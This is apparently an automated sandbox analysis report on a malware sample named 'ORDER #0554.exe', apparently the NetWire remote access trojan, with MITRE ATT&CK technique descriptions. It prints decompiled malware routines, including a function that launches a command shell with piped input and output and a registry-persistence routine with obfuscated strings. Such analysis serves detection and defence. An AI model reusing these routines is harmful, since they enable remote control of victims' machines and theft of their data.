0x004112c6
0x004112cb
0x004112d0
0x004112d6
0x004112da
0x004112e2
0x004112e6
0x004112ea
0x004112ee
0x004112f2
0x004112f6
0x004112fd
0x00411301
0x00411305
0x00411308
0x0041130d
0x00411312
0x00000000
0x00000000
0x00411314
0x00411318
0x0041131c
0x0041131f
0x00411326
0x00411327
0x00411328
0x0041132b
0x00411332
0x00000000
0x00411332
0x004112d2
0x004112d2
0x00000000
0x00000000

Strings

%c%.8x%s%s, xrefs: 00411144
%c%.8x%s, xrefs: 004110F5
%c%.8x%s\%s, xrefs: 004111D9
?, xrefs: 00411007

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %c%.8x%s$%c%.8x%s%s$%c%.8x%s\%s$?
API String ID: 0-1127014073
Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46

Uniqueness

Uniqueness Score: -1.00%

Function 004113B8, Relevance: 5.2, Strings: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004113B8(void* __eax, void* __ecx, char* __edx, void* __eflags, char** _a4) {
				char _v544;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				short _v600;
				intOrPtr _v604;
				char _v612;
				char _v628;
				char* _v632;
				char* _v636;
				char _v640;
				char _v656;
				char _v660;
				char _v668;
				intOrPtr _v672;
				char* _v688;
				intOrPtr _v692;
				char* _v720;
				intOrPtr _v724;
				char* _v728;
				char* _v732;
				char* _v736;
				char* _v740;
				char* _v744;
				char* _v748;
				char* _v752;
				char* _v756;
				char* _v760;
				char* _v764;
				char* _v768;
				char _v772;
				intOrPtr _v776;
				char* _v796;
				intOrPtr _v800;
				char* _v804;
				char* _v808;
				char* _v812;
				char* _v824;
				intOrPtr _v828;
				char* _v832;
				char* _v836;
				char* _v844;
				char* _v848;
				intOrPtr _v852;
				char* _v856;
				void* _t85;
				char* _t92;
				char* _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				char* _t100;
				char* _t102;
				void* _t106;
				char* _t110;
				char** _t118;
				void* _t119;
				char* _t120;
				char* _t121;
				char* _t122;
				char* _t123;
				char* _t125;
				char* _t126;
				char* _t127;
				char** _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				char** _t132;

				_t120 = __edx;
				_t119 = __ecx;
				_t125 =  &_v544;
				_v732 = "ComSpec";
				_t118 = _a4;
				L0041F724();
				E004127A8(_t125, 0x204, "%s", __eax);
				_t85 = E00406F1A(_t120, _t125);
				if(_t85 == 0) {
					_v732 = "WINDIR";
					L0041F724();
					E004127A8(_t125, 0x204, E004081AA("%6\\6Z65dlNh\\YlS.dfd"), _t85);
				}
				if(E00406F1A(_t120, _t125) == 0) {
					L6:
					_v720 = 0;
					L7:
					return E00405D7D(_t120,  *_t118, 0xb9, 0);
				}
				_t122 =  &_v612;
				_t127 =  &_v628;
				_v724 = 0x44;
				_v728 = 0;
				_v636 = 0;
				_v732 = _t122;
				_v632 = 1;
				E004129E4();
				E004129E4(_t127, 0, 0x10);
				_t121 =  &_v640;
				_v720 = 0;
				_v728 =  &_v656;
				_t92 =  &_v660;
				_v724 = _t121;
				_v672 = _t121;
				_v732 = _t92;
				L0041F674();
				_t130 = _t129 - 0x10;
				_t120 = _v688;
				_v736 = 0;
				if(_t92 == 0) {
					goto L7;
				}
				_t93 =  &_v668;
				_v740 = _t120;
				_v744 = 0x42b5d4;
				_v748 = _t93;
				L0041F674();
				_t131 = _t130 - 0x10;
				if(_t93 == 0) {
					goto L6;
				}
				_v764 = _t122;
				L0041F59C();
				_push(_t93);
				_t94 = _v692;
				_v732 = _t127;
				_v736 = _t122;
				_v584 = _t94;
				_v588 = _t94;
				_t95 = _v688;
				_v740 = 0;
				_v744 = 0;
				_v748 = 0;
				_v752 = 1;
				_v756 = 0;
				_v760 = 0;
				_v764 = _t125;
				_v768 = 0;
				_v592 = _t95;
				_v604 = 0x101;
				_v600 = 0;
				L0041F66C();
				_t132 = _t131 - 0x28;
				if(_t95 == 0) {
					goto L6;
				}
				_v808 = _v732;
				L0041F694();
				_push(_t122);
				_t123 = 0;
				_v812 = _v732;
				L0041F694();
				_push(_t127);
				_v804 = 0xffffffff;
				_v808 = _t125;
				_t128 =  &_v728;
				_v812 = 0xb6;
				_v732 = 0;
				 *_t132 =  *_t118;
				E00405D7D(_t120);
				while(1) {
					_t100 = _v744;
					_v796 = 0;
					_v800 = _t128;
					_v804 = 0;
					_v808 = 0;
					_v812 = 0;
					 *_t132 = _t100;
					_v728 = 0;
					L0041F534();
					_t132 = _t132 - 0x18;
					if(_t100 == 0) {
						goto L17;
					}
					L10:
					_t126 = _v752;
					if(_t126 != 0 &&  *0x42b5d0 != 0) {
						if(_t123 >= _t126) {
							L15:
							_v824 = 0;
							_v828 = _t128;
							_v832 = _t126;
							_v836 = _v756;
							_t110 = _v768;
							 *_t132 = _t110;
							L0041F51C();
							_t132 = _t132 - 0x14;
							if(_t110 != 0) {
								_v856 = 0xb7;
								_v848 = _v772;
								_v852 = _v776;
								 *_t132 =  *_t118;
								if(E00405D7D(_t120) + 1 != 0) {
									while(1) {
										_t100 = _v744;
										_v796 = 0;
										_v800 = _t128;
										_v804 = 0;
										_v808 = 0;
										_v812 = 0;
										 *_t132 = _t100;
										_v728 = 0;
										L0041F534();
										_t132 = _t132 - 0x18;
										if(_t100 == 0) {
											goto L17;
										}
										goto L10;
									}
								}
								goto L17;
							}
						} else {
							 *_t132 = _t126;
							L0041F714();
							_v756 = _t100;
							if(_t100 != 0) {
								_t123 = _t126;
								goto L15;
							}
						}
					}
					L18:
					if( *0x42b5d0 != 0) {
						 *_t132 = 0x96;
						E00407EF4();
						continue;
					}
					_t102 = _v768;
					 *_t132 = _t102;
					L0041F694();
					_push(_t102);
					_v844 =  *0x42b5d4;
					L0041F694();
					_v844 = 0;
					_v848 = _v744;
					L0041F4E4();
					_v844 = 0;
					_v848 = 0;
					_v852 = 0xb8;
					_v856 =  *_t118;
					_t106 = E00405D7D(_t120, _t119, _t119, _t120);
					if(_v772 != 0) {
						return E00407F59( &_v772);
					}
					return _t106;
					L17:
					 *0x42b5d0 = 0;
					goto L18;
				}
			}

0x004113b8
0x004113b8
0x004113c2
0x004113c9
0x004113d0
0x004113d7
0x004113f3
0x004113fb
0x00411402
0x00411404
0x0041140b
0x00411431
0x00411431
0x00411440
0x0041157a
0x0041157a
0x00411582
0x00000000
0x00411597
0x00411446
0x0041144a
0x0041144e
0x00411456
0x0041145e
0x00411466
0x00411469
0x00411471
0x00411489
0x00411492
0x00411496
0x0041149e
0x004114a2
0x004114a6
0x004114aa
0x004114ae
0x004114b1
0x004114b6
0x004114bb
0x004114bf
0x004114c7
0x00000000
0x00000000
0x004114cd
0x004114d1
0x004114d5
0x004114dd
0x004114e0
0x004114e5
0x004114ea
0x00000000
0x00000000
0x004114f0
0x004114f3
0x004114f8
0x004114f9
0x004114fd
0x00411501
0x00411505
0x0041150c
0x00411513
0x00411517
0x0041151f
0x00411527
0x0041152f
0x00411537
0x0041153f
0x00411547
0x0041154b
0x00411552
0x00411559
0x00411564
0x0041156e
0x00411573
0x00411578
0x00000000
0x00000000
0x004115a5
0x004115a8
0x004115ad
0x004115b2
0x004115b4
0x004115b7
0x004115bc
0x004115bd
0x004115c5
0x004115c9
0x004115cd
0x004115d7
0x004115df
0x004115e2
0x004115e7
0x004115e7
0x004115eb
0x004115f3
0x004115f7
0x004115ff
0x00411607
0x0041160f
0x00411612
0x0041161a
0x0041161f
0x00411624
0x00000000
0x00000000
0x00411626
0x00411626
0x0041162c
0x00411639
0x0041164d
0x00411651
0x00411659
0x0041165d
0x00411661
0x00411665
0x00411669
0x0041166c
0x00411671
0x00411676
0x0041167c
0x00411684
0x0041168c
0x00411692
0x0041169b
0x004115e7
0x004115e7
0x004115eb
0x004115f3
0x004115f7
0x004115ff
0x00411607
0x0041160f
0x00411612
0x0041161a
0x0041161f
0x00411624
0x00000000
0x00000000
0x00000000
0x00411624
0x004115e7
0x00000000
0x0041169b
0x0041163b
0x0041163b
0x0041163e
0x00411645
0x00411649
0x0041164b
0x00000000
0x0041164b
0x00411649
0x00411639
0x004116ab
0x004116b2
0x0041171c
0x00411723
0x00000000
0x00411723
0x004116b4
0x004116b8
0x004116bb
0x004116c0
0x004116c6
0x004116c9
0x004116d3
0x004116db
0x004116de
0x004116e5
0x004116ed
0x004116f5
0x004116ff
0x00411702
0x0041170c
0x00000000
0x00411715
0x00411737
0x004116a1
0x004116a1
0x00000000
0x004116a1

Strings

%6\6Z65dlNh\YlS.dfd, xrefs: 00411410
D, xrefs: 0041144E
WINDIR, xrefs: 00411404
ComSpec, xrefs: 004113C9

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %6\6Z65dlNh\YlS.dfd$ComSpec$D$WINDIR
API String ID: 0-1530679608
Opcode ID: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
Opcode Fuzzy Hash: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4BC, Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

m6C_0ddrd5Q0RcQ88d0, xrefs: 0040A543
MdYQ0Nh.Sii, xrefs: 0040A50A
m6CEd5mWnWRMd664WRaC5C, xrefs: 0040A529
m6CjRQld0C5dmWnWRMd664WR6, xrefs: 0040A563

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: MdYQ0Nh.Sii$m6CEd5mWnWRMd664WRaC5C$m6C_0ddrd5Q0RcQ88d0$m6CjRQld0C5dmWnWRMd664WR6
API String ID: 0-3174184691
Opcode ID: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
Opcode Fuzzy Hash: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00413A85, Relevance: 5.2, Strings: 4, Instructions: 151COMMON

Download Yara Rule

Strings

%d:%I64u:%s%s;, xrefs: 00413CCD
%s*, xrefs: 00413AB5
%s%s\, xrefs: 00413C1E
%d:%s%s;, xrefs: 00413BCF

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %d:%I64u:%s%s;$%d:%s%s;$%s%s\$%s*
API String ID: 0-525976846
Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57

Uniqueness

Uniqueness Score: -1.00%

Function 00420700, Relevance: 5.1, Strings: 4, Instructions: 131COMMON

Download Yara Rule

Strings

n > 0, xrefs: 004208A6
../nettle-3.5.1/memxor3.c, xrefs: 00420841, 0042089E
n == 1, xrefs: 00420849
M, xrefs: 00420896

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ../nettle-3.5.1/memxor3.c$M$n == 1$n > 0
API String ID: 0-17687075
Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0040B34D, Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

lWkQ54i6.Sii, xrefs: 0040B44A
lWk67i45dN.Sii, xrefs: 0040B49C
%s\%s, xrefs: 0040B3A2, 0040B3E1, 0040B45E, 0040B4B0
lWkniQd.Sii, xrefs: 0040B482

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s\%s$lWk67i45dN.Sii$lWkQ54i6.Sii$lWkniQd.Sii
API String ID: 0-1446494701
Opcode ID: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
Instruction ID: 99cae675b6ce9c0e2fecfda939a24821795d6923156f602411de4cd21c6c0224
Opcode Fuzzy Hash: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
Instruction Fuzzy Hash: D1414BB05083459AC710EF25D58426EBBE0EF91348F41982FE4D8AB382D77D9655CB4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2C3, Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

@, xrefs: 0040A3B3
, xrefs: 0040A2D5
Password, xrefs: 0040A308
, xrefs: 0040A380

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $ $@$Password
API String ID: 0-2841454644
Opcode ID: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
Instruction ID: 5ee87fdfff2276ed8f5c7cc8756256179826899119173577a518fef8d5e42c6b
Opcode Fuzzy Hash: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
Instruction Fuzzy Hash: 2421EFB0509314AED310AF52D58879BBBE4BF85348F408C2EE4C857281D7B985899BAB

Uniqueness

Uniqueness Score: -1.00%

Function 004089ED, Relevance: 5.0, Strings: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E004089ED(void* __ecx, void* __edx, void* __eflags) {
				char _v528;
				char* _v548;
				char* _v552;
				void* _t9;
				void* _t10;
				char* _t15;
				char* _t16;
				char* _t18;
				void* _t20;
				void* _t21;
				char** _t22;

				_t21 = __edx;
				_t20 = __ecx;
				 *_t22 = 8;
				_t9 = E004082E8(__eflags);
				_t24 = _t9;
				if(_t9 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\U4RSWg6\\PQ00dR5zd064WR\\rQR\\";
					_t18 = E004081AA();
					_v548 = 0x4224c8;
					_v552 = _t18;
					 *_t22 = 0x80000001;
					E00410803(_t20, _t21);
				}
				 *_t22 = 0x10;
				_t10 = E004082E8(_t24);
				_t25 = _t10;
				if(_t10 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\DY542d Md5Qs\\XR65CiidS PWlsWRdR56";
					_t16 = E004081AA();
					_v548 = 0x4224a0;
					_v552 = _t16;
					 *_t22 = 0x80000002;
					E0041086B(_t20);
				}
				 *_t22 = 4;
				if(E004082E8(_t25) != 0) {
					_t15 =  *0x42b460;
					if(_t15 != 0) {
						 *_t22 = _t15;
						L0041F78C();
					}
				}
				_v548 = "NetWire";
				_v552 = "SOFTWARE\\";
				 *_t22 = 0x80000001;
				E0041086B(_t20);
				_v552 = 0x204;
				 *_t22 =  &_v528;
				return E00407C77( &_v528);
			}

0x004089ed
0x004089ed
0x004089f3
0x004089fa
0x004089ff
0x00408a01
0x00408a03
0x00408a0a
0x00408a0f
0x00408a17
0x00408a1b
0x00408a22
0x00408a22
0x00408a27
0x00408a2e
0x00408a33
0x00408a35
0x00408a37
0x00408a3e
0x00408a43
0x00408a4b
0x00408a4f
0x00408a56
0x00408a56
0x00408a5b
0x00408a69
0x00408a6b
0x00408a72
0x00408a74
0x00408a77
0x00408a77
0x00408a72
0x00408a7c
0x00408a84
0x00408a8c
0x00408a93
0x00408a9c
0x00408aa4
0x00408ab2

Strings

MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56, xrefs: 00408A37
MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 00408A03
SOFTWARE\, xrefs: 00408A84
NetWire, xrefs: 00408A7C

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$NetWire$SOFTWARE\
API String ID: 0-126448098
Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ORDER #0554.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
